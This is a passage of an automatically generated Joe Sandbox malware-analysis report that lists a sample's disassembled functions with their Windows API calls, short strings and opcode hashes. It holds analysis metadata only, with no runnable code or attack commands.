Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 5633f21f8b878a6ea5f25fb9b80706cab89cfaef4740ca94ac3d3ad2da027e28
Instruction ID: 778f7bd52824da59d3c2d1b715e2d14220dabf62240565e4b0127dc7bc1a7322
Opcode Fuzzy Hash: 5633f21f8b878a6ea5f25fb9b80706cab89cfaef4740ca94ac3d3ad2da027e28
Instruction Fuzzy Hash: 14219D71E01208EFDB11DFA8C949BEEB7BCEF45308F158059E644AB280DB70AE05CB90

Function 0038098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 003809AE

Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50

_fprintf.LIBCMT ref: 003809E5
OutputDebugStringW.KERNEL32(?), ref: 003B5DBB

Part of subcall function 00384AAA: _flsall.LIBCMT ref: 00384AC3

__setmode.LIBCMT ref: 00380A1A

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 95f176a1a321d98cdba8a291daee49e444044b9aef80549b1639346872360dbc
Instruction ID: 4c4aa11221df62732956886dc9de5610a1cd186710fd376aeb509d1a75d442d2
Opcode Fuzzy Hash: 95f176a1a321d98cdba8a291daee49e444044b9aef80549b1639346872360dbc
Instruction Fuzzy Hash: 87112731504345AFDB0BB3B49C469FE77AC9F45320F2041AAF2059F582EF31594647A1

Function 003D1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D17A3

Part of subcall function 003D182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D184C
Part of subcall function 003D182D: InternetCloseHandle.WININET(00000000), ref: 003D18E9

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 34669b47abb6e6395a4834fbde25ec4d611bcaf8111465b398d40711c37a38b7
Instruction ID: d7f394dfbe5db68975d2ccfb29ed7c11badb8bacc8a785ce506e62069ceb38be
Opcode Fuzzy Hash: 34669b47abb6e6395a4834fbde25ec4d611bcaf8111465b398d40711c37a38b7
Instruction Fuzzy Hash: 40215076200605BFEB239F60EC41BBABBADFB88710F10412BF9559A790D7719911A7A0

Function 003C3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,003EFAC0), ref: 003C3A64
GetLastError.KERNEL32 ref: 003C3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 003C3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003EFAC0), ref: 003C3ADF

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 9fc40e69e62bd2551219e72b4c633200e01c63d7d3e43ff7a02fba8ff07a7380
Instruction ID: 60d69606e79a169f1abfac810804f0a83c0e09875a0af3e556ee4dd94dae4ce1
Opcode Fuzzy Hash: 9fc40e69e62bd2551219e72b4c633200e01c63d7d3e43ff7a02fba8ff07a7380
Instruction Fuzzy Hash: 4421A3795082019FC311EF28C881DAA77E8EE59364F108A2DF4D9CB2E1D771DE55CB82

Function 003950E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00395101

Part of subcall function 0038571C: __FF_MSGBANNER.LIBCMT ref: 00385733
Part of subcall function 0038571C: __NMSG_WRITE.LIBCMT ref: 0038573A
Part of subcall function 0038571C: RtlAllocateHeap.NTDLL(00DF0000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 82d3fba494ca5c189a563089757c8e23bb8592f6273c0b75861cf286e86e36e1
Instruction ID: 58b545ada0af4e5d04efcfa53454f37c530f43f5bbe2b7c1e68cb7d51261dcb5
Opcode Fuzzy Hash: 82d3fba494ca5c189a563089757c8e23bb8592f6273c0b75861cf286e86e36e1
Instruction Fuzzy Hash: 3311A072A00B15AFCF333F74AC4575E3B989B543A1F21496AF9449E290DF74C9C18790

Function 003D6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50

gethostbyname.WSOCK32(?), ref: 003D6399
WSAGetLastError.WSOCK32(00000000), ref: 003D63A4
_memmove.LIBCMT ref: 003D63D1
inet_ntoa.WSOCK32(?), ref: 003D63DC

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: d7bae89d0e52483d7b585d7da9cb865be788cf0e5fd49cbb6b9f86b80d30822a
Instruction ID: 1f094e983a96c8ef84b1e4ae9e5032c27f16d4359a5b9ba6721e387bbeb1f0fe
Opcode Fuzzy Hash: d7bae89d0e52483d7b585d7da9cb865be788cf0e5fd49cbb6b9f86b80d30822a
Instruction Fuzzy Hash: 88116372500109AFCB16FBA4DD86DEE77BCAF08310B148176F505EB2A1DB30AE14CB61

Function 003B8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 003B8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8BA4

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 69c3e380c528f19fdfd701c53ee466847ab6e0dfaa7967b3fd957d501c15e749
Instruction ID: c60d3d8697f958c287a2759482cb4991112a3e90c575011972b70797977314f3
Opcode Fuzzy Hash: 69c3e380c528f19fdfd701c53ee466847ab6e0dfaa7967b3fd957d501c15e749
Instruction Fuzzy Hash: 37110A79901218FFDB11DBA5C885EDDBB78EB48710F204195EA00B7290DA716E11DB94

Function 00361290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623

DefDlgProcW.USER32(?,00000020,?), ref: 003612D8
GetClientRect.USER32(?,?), ref: 0039B5FB
GetCursorPos.USER32(?), ref: 0039B605
ScreenToClient.USER32(?,?), ref: 0039B610

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 9bb906280c07b666f6ea768927964fbdcca49e53c2b5554c0130e95997b20a9b
Instruction ID: cd058ac25bc09e7554dac1677ee68160d9a411963ddd3b00943bda8b0d21a763
Opcode Fuzzy Hash: 9bb906280c07b666f6ea768927964fbdcca49e53c2b5554c0130e95997b20a9b
Instruction Fuzzy Hash: 36114F35600459EFCF12EF98D8959FE77B8FB06300F408955F941EB180C770BA518BA5

Function 003BD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003BD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003BD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003BD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003BD897

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 2b15aa868698b9806fe4fd11dafd723f167f0826b9dadf68708ff6d6f0ce7562
Instruction ID: 09477abdc93150647722cba2f2bb71758a97f2d3676be8414340c53e9f0f53f4
Opcode Fuzzy Hash: 2b15aa868698b9806fe4fd11dafd723f167f0826b9dadf68708ff6d6f0ce7562
Instruction Fuzzy Hash: 70115E75605704DFE3218F51DC48F92BBBCEB00B05F108569A616D6890E7B1E5499FA1

Function 00396FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00396FDB

Part of subcall function 003976C2: __fltout2.LIBCMT ref: 003976EB

__cftog_l.LIBCMT ref: 00397001
__cftoe_l.LIBCMT ref: 00397033

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: c652ac84ad067a4a66f08cb5b8fbda01b031fcf7b2a87d3ac497c63b4f4275e5
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 42014C7245914ABBCF175F84CC42CEE3F66BB18350F598415FE18581B1D236C9B1AB81

Function 003EB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 003EB2E4
ScreenToClient.USER32(?,?), ref: 003EB2FC
ScreenToClient.USER32(?,?), ref: 003EB320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003EB33B

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: edc81e27cd0057cff6901f7a44cffd0cbcd2d9748e4eae9688e981afcebf3e4d
Instruction ID: 76e46f260a7c56d6ab5b8888768e2feeabcfe4faba8b6803008ec09125475590
Opcode Fuzzy Hash: edc81e27cd0057cff6901f7a44cffd0cbcd2d9748e4eae9688e981afcebf3e4d
Instruction Fuzzy Hash: A11143B9D00249EFDB51CFA9D8849EEFBB9FB08310F108166E914E3260D775AA558F50

Function 003C6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 003C6BE6

Part of subcall function 003C76C4: _memset.LIBCMT ref: 003C76F9

_memmove.LIBCMT ref: 003C6C09
_memset.LIBCMT ref: 003C6C16
LeaveCriticalSection.KERNEL32(?), ref: 003C6C26

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: c18d7b1a294ef5e207a0abb8fde0580d7ac0ff7e75ec1469441112cfaaf64dd1
Instruction ID: 5eb219b98a38f61203f4fcaa3fa06c0c142fc896cc23b4bae77101fb931482fb
Opcode Fuzzy Hash: c18d7b1a294ef5e207a0abb8fde0580d7ac0ff7e75ec1469441112cfaaf64dd1
Instruction Fuzzy Hash: C3F05E3A200204ABCF026F55DC85E8ABF29EF45320F04C0A5FE089E267D771E911CBB4

Function 00362218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00362231
SetTextColor.GDI32(?,000000FF), ref: 0036223B
SetBkMode.GDI32(?,00000001), ref: 00362250
GetStockObject.GDI32(00000005), ref: 00362258
GetWindowDC.USER32(?,00000000), ref: 0039BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0039BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0039BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0039BEC2
GetPixel.GDI32(00000000,?,?), ref: 0039BEE2
ReleaseDC.USER32(?,00000000), ref: 0039BEED

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 17b4ae16c5f67fc08baabcbe3dc77ac84299d80f2e30f8c5f232ea9036d9939b
Instruction ID: a3e97541c687a5ac1743140fc49feb3c6f4710e6a2fb765b24eb380c4af83279
Opcode Fuzzy Hash: 17b4ae16c5f67fc08baabcbe3dc77ac84299d80f2e30f8c5f232ea9036d9939b
Instruction Fuzzy Hash: 11E03031504184AEEF225F64FC4D7D87B19EB15332F018366FA69480E187B14580DB11

Function 003B8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 003B871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,003B82E6), ref: 003B8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003B82E6), ref: 003B872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,003B82E6), ref: 003B8736

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: bbd4bd74cf3b9b840c485c0be1d4eaf17f206b6b4bcbd8220d6409bae523b80f
Instruction ID: 5bc798ad9a2b688d7f1a1b3e5f02055bd6ba51b1dade7969f20c33904ee34579
Opcode Fuzzy Hash: bbd4bd74cf3b9b840c485c0be1d4eaf17f206b6b4bcbd8220d6409bae523b80f
Instruction Fuzzy Hash: DCE086366122529FD7315FB0AD4DB963BACEF90795F158828B385CD0C0DA749841C750

Function 00366240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%?, xrefs: 0036624E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID: %?
API String ID: 0-3131337030
Opcode ID: e3efff8a41e68c85c22f2ea4edbd847ac7a4059dd9ebf4dfd97589398375ea9a
Instruction ID: 2994db34890fd90290f9627f9541a729eed95920c4cdc959f6d197a80e213c01
Opcode Fuzzy Hash: e3efff8a41e68c85c22f2ea4edbd847ac7a4059dd9ebf4dfd97589398375ea9a
Instruction Fuzzy Hash: 89B1D4758001099BCF17EF94C8969FEBBB8FF44394F50C126E502AB299DB309E85CB95

Function 003DAEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 003DAFAE

Strings

xbB, xrefs: 003DB010
xbB, xrefs: 003DAFE4

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __itow_s
String ID: xbB$xbB
API String ID: 3653519197-2672806994
Opcode ID: a5af788736a22d91272fd4b3fdf17015582d019cfdceb72af3609b36ad7d1437
Instruction ID: b2f04057feac0911b7a626e9fc6a8de2837c46baaf81b539e4fbf16c7b32a171
Opcode Fuzzy Hash: a5af788736a22d91272fd4b3fdf17015582d019cfdceb72af3609b36ad7d1437
Instruction Fuzzy Hash: 69B17E72A00109EFCB16EF54D891EBABBB9FF59300F15805AF9459B392EB70D941CB60

Function 003CAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

__wcsnicmp.LIBCMT ref: 003CB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003CB0F6

Strings

LPT, xrefs: 003CB027

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: ce4178681eb67d346a32725ad56db766e398a21def2ed6f8ab38170d0f49b3a1
Instruction ID: a00c297c6c6ae947560fa3bfd7f22bddc72ee220f267f322fb0ab24ac40410b8
Opcode Fuzzy Hash: ce4178681eb67d346a32725ad56db766e398a21def2ed6f8ab38170d0f49b3a1
Instruction Fuzzy Hash: 69615D75A00215EFCB16DF94C892FAEB7B8EB08310F15806EF956EB291D770AE44CB50

Function 00372957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00372968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00372981

Strings

@, xrefs: 00372975

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 12325cd6b2c60818e23b6e23a493d7602eba0a331acff127af347602f43001f7
Instruction ID: 1d6bd6415ed87fbd3e4f474e0c90000a95211274b922992a7c70f5d03d3fc920
Opcode Fuzzy Hash: 12325cd6b2c60818e23b6e23a493d7602eba0a331acff127af347602f43001f7
Instruction Fuzzy Hash: B05155B24087449BD321EF20D886BABBBECFF89344F41895DF2D8450A5DF318528CB66

Function 003C9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00364F0B: __fread_nolock.LIBCMT ref: 00364F29

_wcscmp.LIBCMT ref: 003C9824
_wcscmp.LIBCMT ref: 003C9837

Strings

FILE, xrefs: 003C9770

Memory Dump Source

